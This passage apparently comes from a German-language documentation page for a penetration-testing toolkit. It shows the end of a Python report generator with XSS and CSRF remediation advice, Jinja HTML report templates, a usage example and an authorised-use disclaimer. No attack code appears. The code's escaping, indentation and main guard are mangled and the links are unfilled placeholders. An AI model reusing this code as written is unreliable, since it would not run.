'effort': 'Medium'
\\\\},
'Cross-Site Scripting': \\\\{
'title': 'XSS Prevention',
'description': 'Implement output encoding and Content Security Policy',
'priority': 'High',
'effort': 'Medium'
\\\\},
'Cross-Site Request Forgery': \\\\{
'title': 'CSRF Protection',
'description': 'Implement CSRF tokens and SameSite cookies',
'priority': 'Medium',
'effort': 'Low'
\\\\}
\\\\}
for vuln_type in vuln_types:
if vuln_type in recommendation_map:
recommendations.append(recommendation_map[vuln_type])
return recommendations
def get_executive_template(self):
return """
<h3>Assessment Overview</h3>
<p>This security assessment was conducted on <strong>\\\\{\\\\{ target \\\\}\\\\}</strong> on \\\\{\\\\{ scan_date \\\\}\\\\}.</p>
<h4>Key Findings</h4>
<ul>
<li>Total Vulnerabilities Found: \\\\{\\\\{ total_vulnerabilities \\\\}\\\\}</li>
<li>High Risk: \\\\{\\\\{ high_risk_count \\\\}\\\\}</li>
<li>Medium Risk: \\\\{\\\\{ medium_risk_count \\\\}\\\\}</li>
<li>Low Risk: \\\\{\\\\{ low_risk_count \\\\}\\\\}</li>
<li>Overall Risk Score: \\\\{\\\\{ risk_score \\\\}\\\\}</li>
</ul>
"""
def get_technical_template(self):
return """
<h3>Vulnerability Details</h3>
\\\\{% for vuln in vulnerabilities %\\\\}
<div class="vulnerability \\\\{\\\\{ vuln.severity|lower \\\\}\\\\}-risk">
<h4>\\\\{\\\\{ vuln.name \\\\}\\\\}</h4>
<p><strong>Severity:</strong> \\\\{\\\\{ vuln.severity \\\\}\\\\}</p>
<p><strong>Description:</strong> \\\\{\\\\{ vuln.description \\\\}\\\\}</p>
<p><strong>Location:</strong> \\\\{\\\\{ vuln.url \\\\}\\\\}</p>
\\\\{% if vuln.proof_of_concept %\\\\}
<p><strong>Proof of Concept:</strong></p>
<pre>\\\\{\\\\{ vuln.proof_of_concept \\\\}\\\\}</pre>
\\\\{% endif %\\\\}
</div>
\\\\{% endfor %\\\\}
"""
def get_recommendations_template(self):
return """
<h3>Security Recommendations</h3>
\\\\{% for rec in recommendations %\\\\}
<div class="recommendation">
<h4>\\\\{\\\\{ rec.title \\\\}\\\\}</h4>
<p>\\\\{\\\\{ rec.description \\\\}\\\\}</p>
<p><strong>Priority:</strong> \\\\{\\\\{ rec.priority \\\\}\\\\}</p>
<p><strong>Implementation Effort:</strong> \\\\{\\\\{ rec.effort \\\\}\\\\}</p>
</div>
\\\\{% endfor %\\\\}
"""
Usage example
if name == "main": generator = PegasusReportGenerator() generator.load_scan_results('scan_results.json')
# Generate HTML report
html_report = generator.generate_full_report('html')
with open('security_assessment_report.html', 'w') as f:
f.write(html_report)
# Generate PDF report
pdf_report = generator.generate_full_report('pdf')
with open('security_assessment_report.pdf', 'wb') as f:
f.write(pdf_report)
```_
--
** Sicherheitshinweis**: Pegasus-Pentest-Arsenal ist ein umfassendes Penetrationstest-Toolkit, das nur für autorisierte Sicherheitstests verwendet werden sollte. Stellen Sie immer sicher, dass Sie eine ausdrückliche schriftliche Genehmigung haben, bevor Sie irgendwelche Systeme oder Anwendungen testen. Das Toolkit enthält leistungsfähige Ausbeutungsfunktionen, die bei Missbrauch Systemschäden oder Datenverluste verursachen könnten. Verwenden Sie dieses Tool verantwortungsvoll und entsprechend den geltenden Gesetzen, Vorschriften und ethischen Richtlinien. Immer im Rahmen autorisierter Penetrationstests arbeiten und verantwortungsvolle Offenlegungspraktiken für entdeckte Schwachstellen verfolgen.
📚 Zusätzliche Ressourcen: - Pegasus Arsenal GitHub Repository - (LINK_4___) - [NIST Cybersecurity Framework](__LINK_4___ - [PTES Technische Leitlinien](LINK_4